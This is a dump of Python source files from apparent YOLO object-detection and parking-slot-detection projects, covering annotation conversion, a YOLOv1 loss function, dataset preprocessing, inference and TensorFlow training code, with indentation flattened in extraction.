def write_to_txt(out_txt_path,result):
with open(os.path.join(out_txt_path, 'train.txt'), 'w') as json_file:
for text in result:
#print(text)
json_file.write(text + '\n')
def get_text_mark(file_path, voc_file_path, out_Annotations_path):
xml_content = []
print(file_path)
name = file_path.split('/')[-1]
name = name.split('.')[0]
with open(file_path, 'r', encoding='utf-8') as fid:
result_dict = json.load(fid)
obj = result_dict['outputs']['object']
width, height = get_size(result_dict)
xml_content.append("<annotation>")
xml_content.append(" <folder>" + voc_file_path + "</folder>")
xml_content.append(" #" + name + '.jpg' + "</filename>")
xml_content.append(" <size>")
xml_content.append(" <width>" + str(width) + "</width>")
xml_content.append(" <height>" + str(height) + "</height>")
xml_content.append(" </size>")
xml_content.append(" <segmented>0</segmented>")
for obj_item in obj:
cate_name = obj_item['name']
coords = obj_item['bndbox']
try:
bbox = [float(coords['xmin']),float(coords['ymin']),float(coords['xmax']),float(coords['ymax'])]
xml_content.append(" <object>")
xml_content.append(" <name>" + cate_name + "</name>")
xml_content.append(" <pose>Unspecified</pose>")
xml_content.append(" <truncated>0</truncated>")
xml_content.append(" <difficult>0</difficult>")
xml_content.append(" <bndbox>")
xml_content.append(" <xmin>" + str(int(bbox[0])) + "</xmin>")
xml_content.append(" <ymin>" + str(int(bbox[1])) + "</ymin>")
xml_content.append(" <xmax>" + str(int(bbox[2])) + "</xmax>")
xml_content.append(" <ymax>" + str(int(bbox[3])) + "</ymax>")
xml_content.append(" </bndbox>")
xml_content.append(" </object>")
except:
continue
xml_content.append("</annotation>")
x = xml_content
xml_content = [x[i] for i in range(0, len(x)) if x[i] != "\n"]
xml_path = os.path.join(out_Annotations_path, name + '.xml')
with open(xml_path, 'w+', encoding="utf8") as f:
f.write('\n'.join(xml_content))
xml_content[:] = []
return
def json2voc(src_path, dst_path):
src_image_dir = os.path.join(src_path, "images")
src_label_dir = os.path.join(src_path, "labels")
dst_Annotations_dir = os.path.join(dst_path, "Annotations")
dst_ImageSets_dir = os.path.join(dst_path, "ImageSets/Main")
dst_JPEGImages_dir = os.path.join(dst_path, "JPEGImages")
train_list = []
filelist = os.listdir(src_image_dir)
for i in filelist:
try:
src = os.path.join(os.path.abspath(src_image_dir), i)
name = i.split('.')[0]
# print(name)
train_list.append(name)
dst = os.path.join(os.path.abspath(dst_JPEGImages_dir), name + '.jpg')
im = Image.open(src)
im = im.convert('RGB')
im.save(dst, quality=95)
except:
print(i + 'wrong')
continue
write_to_txt(dst_ImageSets_dir, train_list)
files, files_len = get_files(src_label_dir)
for file in files:
try:
get_text_mark(file, dst_path, dst_Annotations_dir)
except:
print(file + 'wrong')
continue
def read_class_names(classes_file):
names = {}
with open(classes_file, 'r') as data:
for id, name in enumerate(data):
names[name.strip('\n')] = id
return names
def read_anchors(anchors_file):
anchors = []
with open(anchors_file) as f:
data = f.readline()
data = data.split(',')
for i in range(0, len(data), 2):
anchors.append([int(data[i]), int(data[i + 1])])
return anchors
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
if __name__ == '__main__':
json2voc('/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets', '/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets/voc')
#rename_datas("/home/chenwei/HDD/Project/datasets/segmentation/周视数据", "/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets")
```
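A hedged illustration of the mapping `read_class_names` builds; the class file contents here are made up:
```python
# classes.txt (hypothetical contents, one name per line):
#   car
#   pedestrian
#   cyclist
names = read_class_names("classes.txt")
print(names)  # {'car': 0, 'pedestrian': 1, 'cyclist': 2}
```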
#### File: Parking-slot-Detection/utils/show_xml_label.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import os
import cv2
import re
pattens = ['name', 'xmin', 'ymin', 'xmax', 'ymax']
def get_annotations(xml_path):
bbox = []
with open(xml_path, 'r') as f:
text = f.read().replace('\n', 'return')
p1 = re.compile(r'(?<=<object>)(.*?)(?=</object>)')
result = p1.findall(text)
for obj in result:
tmp = []
for patten in pattens:
p = re.compile(r'(?<=<{}>)(.*?)(?=</{}>)'.format(patten, patten))
if patten == 'name':
tmp.append(p.findall(obj)[0])
else:
tmp.append(int(float(p.findall(obj)[0])))
bbox.append(tmp)
return bbox
def save_viz_image(image_path, xml_path, save_path):
bbox = get_annotations(xml_path)
image = cv2.imread(image_path)
for info in bbox:
cv2.rectangle(image, (info[1], info[2]), (info[3], info[4]), (255, 0, 0), thickness=2)
cv2.putText(image, info[0], (info[1], info[2]), cv2.FONT_HERSHEY_PLAIN, 2,(0, 0, 255), 2)
if not os.path.exists(save_path):
os.mkdir(save_path)
cv2.imwrite(os.path.join(save_path, image_path.split('/')[-1]), image)
def show_and_save(path):
image_dir = 'JPEGImages'
xml_dir = 'Annotations'
save_dir = 'viz_images'
image_path1 = os.path.join(os.path.abspath(path), image_dir)
xml_path1 = os.path.join(os.path.abspath(path), xml_dir)
save_path = os.path.join(os.path.abspath(path), save_dir)
image_list = os.listdir(image_path1)
for i in image_list:
image_path = os.path.join(image_path1, i)
xml_path = os.path.join(xml_path1, i.replace('.png', '.xml'))
save_viz_image(image_path, xml_path, save_path)
def write_txt(root_path):
src_ImageSets_dir = os.path.join(root_path, "ImageSets/Main")
src_JPEGImages_dir = os.path.join(root_path, "JPEGImages")
train_list = []
filelist = os.listdir(src_JPEGImages_dir)
for i in filelist:
try:
name = i.split('png')[0]
# print(name)
train_list.append(name[:-1])
except:
print(i + 'wrong')
continue
with open(os.path.join(src_ImageSets_dir, 'train.txt'), 'w') as json_file:
for text in train_list:
# print(text)
json_file.write(text + '\n')
if __name__ == '__main__':
# write_txt("/home/chenwei/HDD/Project/Parking-slot-Detection/datasets/voc_bosh_clyinder")
path = '/home/chenwei/HDD/Project/Parking-slot-Detection/datasets/voc_bosh_clyinder'
show_and_save(path)
``` |
{
"source": "530824679/YOLOv1",
"score": 3
} |
#### File: YOLOv1/utils/loss_utils.py
```python
import tensorflow as tf
from cfg.config import model_params, solver_params
class Loss(object):
def __init__(self, predicts, labels, scope='loss'):
"""
        :param predicts: network output [batch, cell_size * cell_size * (5 * boxes_per_cell + class_num)]
        :param labels: ground-truth labels [batch, cell_size, cell_size, 5 + class_num]
        :param scope: name scope for the loss
"""
self.batch_size = solver_params['batch_size']
self.image_size = model_params['image_size']
self.cell_size = model_params['cell_size']
self.num_class = model_params['num_classes']
self.boxes_per_cell = model_params['boxes_per_cell']
self.boundary1 = model_params['cell_size'] * model_params['cell_size'] * model_params['num_classes']
self.boundary2 = self.boundary1 + model_params['cell_size'] * model_params['cell_size'] * model_params['boxes_per_cell']
self.class_scale = model_params['class_scale']
self.object_scale = model_params['object_scale']
self.noobject_scale = model_params['noobject_scale']
self.coord_scale = model_params['coord_scale']
self.loss_layer(predicts, labels, scope='loss')
def loss_layer(self, predicts, labels, scope='loss'):
        # Predicted coords: x, y centers are relative to each cell; sqrt(w), sqrt(h) are relative to the whole image (range 0-1)
        with tf.name_scope('Predicts_Tensor'):
            # class predictions: reshape predicts --> [batch_size, 7, 7, 20]
            predicts_classes = tf.reshape(predicts[:, :self.boundary1], [self.batch_size, self.cell_size, self.cell_size, self.num_class])
            # confidence predictions: reshape predicts --> [batch_size, 7, 7, 2]
            predicts_scales = tf.reshape(predicts[:, self.boundary1:self.boundary2], [self.batch_size, self.cell_size, self.cell_size, self.boxes_per_cell])
            # box predictions: reshape predicts --> [batch_size, 7, 7, 2, 4]
            predicts_boxes = tf.reshape(predicts[:, self.boundary2:], [self.batch_size, self.cell_size, self.cell_size, self.boxes_per_cell, 4])
        # Label coords: x, y, w, h are relative to the whole image (range 0-1)
        with tf.name_scope('Labels_Tensor'):
            # reshape labels --> [batch_size, 7, 7, 1]; the cell responsible for detecting an object is marked 1
            labels_response = tf.reshape(labels[..., 0], [self.batch_size, self.cell_size, self.cell_size, 1])
            # box labels: reshape labels --> [batch_size, 7, 7, 2, 4]; boxes are given in image-size units (x, y, width, height)
            labels_boxes = tf.reshape(labels[..., 1:5], [self.batch_size, self.cell_size, self.cell_size, 1, 4])
            labels_boxes = tf.tile(labels_boxes, [1, 1, 1, self.boxes_per_cell, 1]) / self.image_size
            # class labels: reshape labels --> [batch, 7, 7, 20]
labels_classes = labels[..., 5:]
'''
        # Convert the bbox offsets the network predicts (relative to each cell)
        # into bbox center coordinates expressed as a fraction of the image
        offset = np.transpose(np.reshape(np.array([np.arange(para.cell_size)] * para.cell_size * para.box_per_cell),
                              (para.box_per_cell, para.cell_size, para.cell_size)), (1, 2, 0))
        # Convert to a 4-D tensor
        offset = tf.reshape(tf.constant(offset, dtype=tf.float32), [1, para.cell_size, para.cell_size, para.box_per_cell])
        # Tile along dimension 0 batch_size times
        offset = tf.tile(offset, [para.batch_size, 1, 1, 1])
        offset_tran = tf.transpose(offset, (0, 2, 1, 3))
'''
with tf.variable_scope(scope):
            # classification loss
            class_loss = self.class_loss(predicts_classes, labels_classes, labels_response)
            # cell-relative x, y and image-relative sqrt(w), sqrt(h) --> image-relative x, y, w, h
            global_predict_boxes = self.predicts_to_labels_coord(predicts_boxes)
            # compute IoU [batch, 7, 7, 2]
            iou = self.calc_iou(global_predict_boxes, labels_boxes)
            # compute the object and no-object masks
            object_mask, noobject_mask = self.calc_mask(iou, labels_response)
            # confidence loss
            object_loss, noobject_loss = self.confidence_loss(predicts_scales, iou, object_mask, noobject_mask)
            # localization loss
            boxes_loss = self.coord_loss(predicts_boxes, labels_boxes, object_mask)
tf.losses.add_loss(class_loss)
tf.losses.add_loss(object_loss)
tf.losses.add_loss(noobject_loss)
tf.losses.add_loss(boxes_loss)
tf.summary.scalar('class_loss', class_loss)
tf.summary.scalar('object_loss', object_loss)
tf.summary.scalar('noobject_loss', noobject_loss)
tf.summary.scalar('boxes_loss', boxes_loss)
tf.summary.histogram('iou', iou)
def class_loss(self, predicts_class, labels_class, labels_response):
"""
        Compute the classification loss.
        :param predicts_class: predicted classes [batch, 7, 7, 20]
        :param labels_class: label classes [batch, 7, 7, 20]
        :param labels_response: whether each cell contains an object [batch, 7, 7, 1]
:return:
"""
with tf.name_scope('class_loss'):
class_delta = labels_response * (predicts_class - labels_class)
class_loss = self.class_scale * tf.reduce_mean(tf.reduce_sum(tf.square(class_delta), axis=[1, 2, 3]), name='class_loss')
return class_loss
def confidence_loss(self, predicts_scale, iou, object_mask, noobject_mask):
'''
        Compute the confidence loss.
        :param predicts_scale: predicted confidence [batch, 7, 7, 2]
        :param iou: IoU result [batch, 7, 7, 2]
        :param object_mask: object mask [batch, 7, 7, 2]; 1 where an object is present, 0 elsewhere
        :param noobject_mask: no-object mask [batch, 7, 7, 2]; 1 where no object is present, 0 elsewhere
:return:
'''
with tf.name_scope('confidence_loss'):
with tf.name_scope('object_confidence_loss'):
object_confidence_delta = object_mask * (predicts_scale - iou)
object_confidence_loss = self.object_scale * tf.reduce_mean(tf.reduce_sum(tf.square(object_confidence_delta), axis=[1, 2, 3]))
with tf.name_scope('noobject_confidence_loss'):
noobject_confidence_delta = noobject_mask * (predicts_scale - 0)
noobject_confidence_loss = self.noobject_scale * tf.reduce_mean(tf.reduce_sum(tf.square(noobject_confidence_delta), axis=[1, 2, 3]))
return object_confidence_loss, noobject_confidence_loss
def coord_loss(self, predicts_boxes, labels_boxes, object_mask):
'''
        Compute the localization loss.
        :param predicts_boxes: predicted boxes, cell-relative x, y and image-relative sqrt(w), sqrt(h) [batch, 7, 7, 2, 4]
        :param labels_boxes: label boxes, image-relative x, y, w, h [batch, 7, 7, 2, 4]
        :param object_mask: object mask [batch, 7, 7, 2]
:return:
'''
with tf.name_scope('coord_loss'):
coord_mask = tf.expand_dims(object_mask, axis=-1)
            cell_labels_boxes = self.labels_to_predicts_coord(labels_boxes)
            coord_delta = coord_mask * (predicts_boxes - cell_labels_boxes)
boxes_loss = self.coord_scale * tf.reduce_mean(tf.reduce_sum(tf.square(coord_delta), axis=[1, 2, 3, 4]))
tf.summary.histogram('boxes_delta_x', coord_delta[..., 0])
tf.summary.histogram('boxes_delta_y', coord_delta[..., 1])
tf.summary.histogram('boxes_delta_w', coord_delta[..., 2])
tf.summary.histogram('boxes_delta_h', coord_delta[..., 3])
return boxes_loss
def predicts_to_labels_coord(self, predicts_boxes):
        # bbox center xy is the offset from the top-left corner of its cell
offset_axis_2 = tf.tile(tf.expand_dims(tf.range(7), axis=0), multiples=[7, 1])
offset_axis_2 = tf.tile(tf.reshape(offset_axis_2, shape=[1, 7, 7, 1]), multiples=[self.batch_size, 1, 1, 2])
offset_axis_1 = tf.transpose(offset_axis_2, (0, 2, 1, 3))
offset_axis_2 = tf.cast(offset_axis_2, dtype=tf.float32)
offset_axis_1 = tf.cast(offset_axis_1, dtype=tf.float32)
x = (predicts_boxes[..., 0] + offset_axis_2) / self.cell_size
y = (predicts_boxes[..., 1] + offset_axis_1) / self.cell_size
w = tf.square(predicts_boxes[..., 2])
h = tf.square(predicts_boxes[..., 3])
global_predicts_boxes = tf.stack([x, y, w, h], axis=-1)
return global_predicts_boxes
def labels_to_predicts_coord(self, labels_boxes):
        # x, y become offsets from the cell's top-left corner; width and height stay as image-relative fractions
offset_axis_2 = tf.tile(tf.expand_dims(tf.range(7), axis=0), multiples=[7, 1])
offset_axis_2 = tf.tile(tf.reshape(offset_axis_2, shape=[1, 7, 7, 1]), multiples=[self.batch_size, 1, 1, 2])
offset_axis_1 = tf.transpose(offset_axis_2, (0, 2, 1, 3))
offset_axis_2 = tf.cast(offset_axis_2, dtype=tf.float32)
offset_axis_1 = tf.cast(offset_axis_1, dtype=tf.float32)
x = labels_boxes[..., 0] * self.cell_size - offset_axis_2
y = labels_boxes[..., 1] * self.cell_size - offset_axis_1
sqrt_w = tf.sqrt(labels_boxes[..., 2])
sqrt_h = tf.sqrt(labels_boxes[..., 3])
        cell_labels_boxes = tf.stack([x, y, sqrt_w, sqrt_h], axis=-1)
        return cell_labels_boxes
def calc_iou(self, boxes_1, boxes_2, scope='iou'):
'''
        Compute the IoU between the predicted BBoxes and the labels.
        :param boxes_1: predicted boxes [batch, cell, cell, boxes_per_cell, 4] / [x, y, w, h]
        :param boxes_2: label boxes [batch, cell, cell, boxes_per_cell, 4] / [x, y, w, h]
        :param scope: name scope "iou"
:return:
'''
with tf.name_scope(scope):
# transform [center_x, center_y, w, h]——>[x1, y1, x2, y2]
boxes1 = tf.stack([boxes_1[..., 0] - boxes_1[..., 2] / 2.0,
boxes_1[..., 1] - boxes_1[..., 3] / 2.0,
boxes_1[..., 0] + boxes_1[..., 2] / 2.0,
boxes_1[..., 1] + boxes_1[..., 3] / 2.0], axis=-1)
boxes2 = tf.stack([boxes_2[..., 0] - boxes_2[..., 2] / 2.0,
boxes_2[..., 1] - boxes_2[..., 3] / 2.0,
boxes_2[..., 0] + boxes_2[..., 2] / 2.0,
boxes_2[..., 1] + boxes_2[..., 3] / 2.0], axis=-1)
lu = tf.maximum(boxes1[..., :2], boxes2[..., :2])
rd = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
            # [batch, 7, 7, 2]: IoU of each of the 2 bboxes against the label
intersection_wh = tf.maximum(0.0, rd - lu)
intersection_area = intersection_wh[..., 0] * intersection_wh[..., 1]
square1 = boxes1[..., 2] * boxes1[..., 3]
square2 = boxes2[..., 2] * boxes2[..., 3]
union_area = tf.maximum(square1 + square2 - intersection_area, 1e-10)
return tf.clip_by_value(intersection_area / union_area, 0.0, 1.0)
def calc_mask(self, iou, response):
'''
        Compute the object / no-object masks.
        :param iou: IoU of the 2 BBoxes [batch, 7, 7, 2]
        :param response: [batch, 7, 7, 1]
        :return: object mask [batch, 7, 7, 2], no-object mask [batch, 7, 7, 2]
'''
        # Take the maximum IoU among the boxes each cell predicts
        object_mask = tf.reduce_max(iou, axis=-1, keep_dims=True)
        # Shape [batch_size, 7, 7, 2]: if a cell truly contains an object, the box with the highest IoU
        # in that cell is set to 1 (it is responsible for the prediction), the rest to 0
        object_mask = tf.cast((iou >= object_mask), tf.float32)
        # Multiply by the ground-truth response to keep only responsible boxes in cells that actually contain an object
        object_mask = object_mask * response
        # No-object mask, shape [batch_size, 7, 7, 2]: 1 where there is truly no object, 0 where there is
        no_object_mask = tf.ones_like(object_mask, dtype=tf.float32) - object_mask
return object_mask, no_object_mask
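# Hand-check of the corner-based IoU computed in calc_iou above, on two
# illustrative [cx, cy, w, h] boxes:
#   a = [0.5, 0.5, 0.2, 0.2], b = [0.55, 0.5, 0.2, 0.2]
#   intersection = (0.2 - 0.05) * 0.2 = 0.03
#   union        = 0.04 + 0.04 - 0.03 = 0.05
#   iou          = 0.03 / 0.05 = 0.6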
``` |
{
"source": "530824679/YOLOv2",
"score": 2
} |
#### File: YOLOv2/data/dataset.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import os
from PIL import Image
import math
import numpy as np
import tensorflow as tf
from cfg.config import path_params, model_params, classes_map
from utils.process_utils import *
from data.augmentation import *
class Dataset(object):
def __init__(self):
self.data_path = path_params['data_path']
self.anchors = model_params['anchors']
self.num_classes = model_params['classes']
self.input_height = model_params['input_height']
self.input_width = model_params['input_width']
self.grid_height = model_params['grid_height']
self.grid_width = model_params['grid_width']
self.iou_threshold = model_params['iou_threshold']
def convert(self, data):
"""
transform [x,y,w,h,class_id to [x1,y1,x2,y2, class_id]
:param data: label data shape is [5,]
:return: [x1, y1, x2, y2, class_id]
"""
x1 = data[1] - data[3] / 2.0
y1 = data[2] - data[4] / 2.0
x2 = data[1] + data[3] / 2.0
y2 = data[2] + data[4] / 2.0
class_id = data[0]
return [x1, y1, x2, y2, class_id]
def letterbox_resize(self, image, bboxes, new_height, new_width, interp=0):
"""
Resize the image and correct the bbox accordingly.
:param image: BGR image data shape is [height, width, channel]
:param bboxes: bounding box shape is [num, 4]
:param new_height: new image height
:param new_width: new image width
:param interp:
:return: image_padded, bboxes
"""
origin_height, origin_width = image.shape[:2]
resize_ratio = min(new_width / origin_width, new_height / origin_height)
resize_width = int(resize_ratio * origin_width)
resize_height = int(resize_ratio * origin_height)
image = cv2.resize(image, (resize_width, resize_height), interpolation=interp)
image_padded = np.full((new_height, new_width, 3), 128, np.uint8)
dw = int((new_width - resize_width) / 2)
dh = int((new_height - resize_height) / 2)
image_padded[dh:resize_height + dh, dw:resize_width + dw, :] = image
# xmin, xmax, ymin, ymax
bboxes[:, [0, 2]] = bboxes[:, [0, 2]] * resize_ratio + dw
bboxes[:, [1, 3]] = bboxes[:, [1, 3]] * resize_ratio + dh
return image_padded, bboxes
def load_data(self, filename):
"""
load image and label
:param filename: file name
:return: image_raw, bbox_raw, image_shape
"""
image_path = os.path.join(self.data_path, "images", filename+'.jpg')
image = cv2.imread(image_path)
image_shape = image.shape
label_path = os.path.join(self.data_path, "labels", filename+'.txt')
lines = [line.rstrip() for line in open(label_path)]
bboxes = []
for line in lines:
data = line.split(' ')
data[0:] = [float(t) for t in data[0:]]
box = self.convert(data)
bboxes.append(box)
while len(bboxes) < 150:
bboxes = np.append(bboxes, [[0.0, 0.0, 0.0, 0.0, 0.0]], axis=0)
bboxes = np.array(bboxes, dtype=np.float32)
image_raw = image.tobytes()
bbox_raw = bboxes.tobytes()
return image_raw, bbox_raw, image_shape
def preprocess_true_data(self, image, labels):
"""
preprocess true boxes to train input format
:param image: numpy.ndarray of shape [416, 416, 3]
:param labels: numpy.ndarray of shape [20, 5]
shape[0]: the number of labels in each image.
shape[1]: x_min, y_min, x_max, y_max, class_index, yaw
:return:
image_norm is normalized image[0~1]
y_true shape is [feature_height, feature_width, per_anchor_num, 5 + num_classes]
"""
        # Data augmentation: random horizontal flip, crop, and translation
image = np.array(image)
image, labels = random_horizontal_flip(image, labels)
image, labels = random_crop(image, labels)
image, labels = random_translate(image, labels)
        # Resize the image to 416x416 (letterbox) and normalize to [0, 1]
image_rgb = cv2.cvtColor(np.copy(image), cv2.COLOR_BGR2RGB).astype(np.float32)
image_rgb, labels = letterbox_resize(image_rgb, (self.input_height, self.input_width), np.copy(labels), interp=0)
image_norm = image_rgb / 255.
input_shape = np.array([self.input_height, self.input_width], dtype=np.int32)
assert input_shape[0] % 32 == 0
assert input_shape[1] % 32 == 0
feature_sizes = input_shape // 32
        # anchors, normalized to the 0-1 image space
        num_anchors = len(self.anchors)
        anchor_array = np.array(model_params['anchors'])
        # labels: drop empty (all-zero) rows
valid = (np.sum(labels, axis=-1) > 0).tolist()
labels = labels[valid]
y_true = np.zeros(shape=[feature_sizes[0], feature_sizes[1], num_anchors, 4 + 1 + len(self.num_classes)], dtype=np.float32)
boxes_xy = (labels[:, 0:2] + labels[:, 2:4]) / 2
boxes_wh = labels[:, 2:4] - labels[:, 0:2]
true_boxes = np.concatenate([boxes_xy, boxes_wh], axis=-1)
anchors_max = anchor_array / 2.
anchors_min = - anchor_array / 2.
valid_mask = boxes_wh[:, 0] > 0
wh = boxes_wh[valid_mask]
# [N, 1, 2]
wh = np.expand_dims(wh, -2)
boxes_max = wh / 2.
boxes_min = - wh / 2.
# [N, 1, 2] & [5, 2] ==> [N, 5, 2]
intersect_mins = np.maximum(boxes_min, anchors_min)
intersect_maxs = np.minimum(boxes_max, anchors_max)
# [N, 5, 2]
intersect_wh = np.maximum(intersect_maxs - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchor_array[:, 0] * anchor_array[:, 1]
# [N, 5]
iou = intersect_area / (box_area + anchor_area - intersect_area + tf.keras.backend.epsilon())
# Find best anchor for each true box [N]
best_anchor = np.argmax(iou, axis=-1)
for t, k in enumerate(best_anchor):
i = int(np.floor(true_boxes[t, 0] / 32.))
j = int(np.floor(true_boxes[t, 1] / 32.))
c = labels[t, 4].astype('int32')
y_true[j, i, k, 0:4] = true_boxes[t, 0:4]
y_true[j, i, k, 4] = 1
y_true[j, i, k, 5 + c] = 1
return image_norm, y_true
```
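A quick numeric sanity check of the letterbox box correction used above; the image size and box below are illustrative values, not project data:
```python
import numpy as np

# A 100x200 (h x w) image letterboxed into 416x416 scales by
# min(416/200, 416/100) = 2.08 and is padded vertically by dh = 104.
origin_h, origin_w, new_h, new_w = 100, 200, 416, 416
ratio = min(new_w / origin_w, new_h / origin_h)
dw = int((new_w - int(ratio * origin_w)) / 2)
dh = int((new_h - int(ratio * origin_h)) / 2)
box = np.array([[10., 20., 110., 80.]])   # x1, y1, x2, y2
box[:, [0, 2]] = box[:, [0, 2]] * ratio + dw
box[:, [1, 3]] = box[:, [1, 3]] * ratio + dh
print(ratio, dw, dh, box)                 # 2.08 0 104 [[ 20.8 145.6 228.8 270.4]]
```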
#### File: 530824679/YOLOv2/test.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import tensorflow as tf
from utils.process_utils import *
from model.network import Network
from cfg.config import *
os.environ["CUDA_VISIBLE_DEVICES"]="0"
def predict_video():
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
capture = cv2.VideoCapture(0)
input = tf.placeholder(shape=[1, None, None, 3], dtype=tf.float32)
network = Network(is_train=False)
logits = network.build_network(input)
output = network.reorg_layer(logits, model_params['anchors'])
checkpoints = "./checkpoints/model.ckpt-128"
saver = tf.train.Saver()
with tf.Session(config=config) as sess:
saver.restore(sess, checkpoints)
while (True):
ref, image = capture.read()
image_size = image.shape[:2]
input_shape = [model_params['input_height'], model_params['input_width']]
image_data = pre_process(image, input_shape)
image_data = image_data[np.newaxis, ...]
bboxes, obj_probs, class_probs = sess.run(output, feed_dict={input: image_data})
bboxes, scores, class_id = postprocess(bboxes, obj_probs, class_probs, image_shape=image_size, input_shape=input_shape)
img_detection = visualization(image, bboxes, scores, class_id, model_params["classes"])
cv2.imshow("result", img_detection)
cv2.waitKey(1)
cv2.destroyAllWindows()
def predict_image():
image_path = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/images/2002_07_19_big_img_130.jpg"
image = cv2.imread(image_path)
image_size = image.shape[:2]
input_shape = [model_params['input_height'], model_params['input_width']]
image_data = pre_process(image, input_shape)
image_data = image_data[np.newaxis, ...]
input = tf.placeholder(shape=[1, None, None, 3], dtype=tf.float32)
network = Network(is_train=False)
logits = network.build_network(input)
output = network.reorg_layer(logits, model_params['anchors'])
checkpoints = "./checkpoints/model.ckpt-128"
saver = tf.train.Saver()
with tf.Session() as sess:
saver.restore(sess, checkpoints)
bboxes, obj_probs, class_probs = sess.run(output, feed_dict={input: image_data})
bboxes, scores, class_id = postprocess(bboxes, obj_probs, class_probs, image_shape=image_size, input_shape=input_shape)
img_detection = visualization(image, bboxes, scores, class_id, model_params["classes"])
cv2.imshow("result", img_detection)
cv2.waitKey(0)
if __name__ == "__main__":
predict_video()
```
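`pre_process` and `postprocess` come from `utils.process_utils` and are not shown in this dump. A minimal sketch of what `pre_process` is assumed to do (BGR to RGB, resize to the model input, scale to [0, 1]) could be:
```python
import cv2
import numpy as np

def pre_process_sketch(image, input_shape):
    """Hypothetical stand-in for utils.process_utils.pre_process."""
    height, width = input_shape
    rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)   # model expects RGB
    resized = cv2.resize(rgb, (width, height))     # cv2.resize takes (w, h)
    return resized.astype(np.float32) / 255.0      # normalize to [0, 1]
```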
#### File: 530824679/YOLOv2/train.py
```python
import os
import time
import math
import numpy as np
import tensorflow as tf
from tqdm import tqdm
import tensorflow.contrib.slim as slim
from cfg.config import path_params, solver_params
from utils.dataset_utils import total_sample
from model.network import Network
from data import tfrecord
def train():
start_step = 0
log_step = solver_params['log_step']
restore = solver_params['restore']
checkpoint_dir = path_params['checkpoints_dir']
checkpoints_name = path_params['checkpoints_name']
tfrecord_dir = path_params['tfrecord_dir']
tfrecord_name = path_params['train_tfrecord_name']
log_dir = path_params['logs_dir']
batch_size = solver_params['batch_size']
    # Configure the GPU
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
    # Parse the training samples and their annotations
data = tfrecord.TFRecord()
train_tfrecord = os.path.join(tfrecord_dir, tfrecord_name)
data_num = total_sample(train_tfrecord)
batch_num = int(math.ceil(float(data_num) / batch_size))
dataset = data.create_dataset(train_tfrecord, batch_num, batch_size=batch_size, is_shuffle=True)
iterator = dataset.make_one_shot_iterator()
images, y_true = iterator.get_next()
images.set_shape([None, 416, 416, 3])
y_true.set_shape([None, 13, 13, 5, 6])
    # Build the network
network = Network(is_train=True)
logits = network.build_network(images)
    # Compute the loss
total_loss, diou_loss, confs_loss, class_loss = network.calc_loss(logits, y_true)
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.train.exponential_decay(solver_params['lr'], global_step, solver_params['decay_steps'], solver_params['decay_rate'], staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(total_loss, global_step=global_step)
    # Configure tensorboard scalar summaries
tf.summary.scalar("learning_rate", learning_rate)
tf.summary.scalar('total_loss', total_loss)
tf.summary.scalar("diou_loss", diou_loss)
tf.summary.scalar("confs_loss", confs_loss)
tf.summary.scalar("class_loss", class_loss)
    # Configure the tensorboard summary writer
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(log_dir, graph=tf.get_default_graph(), flush_secs=60)
    # Model checkpoint saving
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=50)
with tf.Session(config=config) as sess:
sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
if restore == True:
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
stem = os.path.basename(ckpt.model_checkpoint_path)
restore_step = int(stem.split('.')[0].split('-')[-1])
start_step = restore_step
sess.run(global_step.assign(restore_step))
saver.restore(sess, ckpt.model_checkpoint_path)
                print('Restoring from {}'.format(ckpt.model_checkpoint_path))
else:
print("Failed to find a checkpoint")
if solver_params['pre_train']:
pretrained = np.load(path_params['pretrain_weights'], allow_pickle=True).item()
for variable in tf.trainable_variables():
for key in pretrained.keys():
                    key2 = variable.name.split(':')[0]  # drop the ':0' suffix; rstrip(':0') would also strip trailing zeros
if (key == key2):
sess.run(tf.assign(variable, pretrained[key]))
summary_writer.add_graph(sess.graph)
print('\n----------- start to train -----------\n')
for epoch in range(start_step + 1, solver_params['epoches']):
train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss = [], [], [], []
for index in tqdm(range(batch_num)):
_, summary_, loss_, diou_loss_, confs_loss_, class_loss_, global_step_, lr = sess.run([train_op, summary_op, total_loss, diou_loss, confs_loss, class_loss, global_step, learning_rate])
train_epoch_loss.append(loss_)
train_epoch_diou_loss.append(diou_loss_)
train_epoch_confs_loss.append(confs_loss_)
train_epoch_class_loss.append(class_loss_)
summary_writer.add_summary(summary_, global_step_)
train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss = np.mean(train_epoch_loss), np.mean(train_epoch_diou_loss), np.mean(train_epoch_confs_loss), np.mean(train_epoch_class_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, diou_loss: {:.3f}, confs_loss: {:.3f}, class_loss: {:.3f}".format(epoch, global_step_, lr, train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss))
saver.save(sess, os.path.join(checkpoint_dir, checkpoints_name), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
```
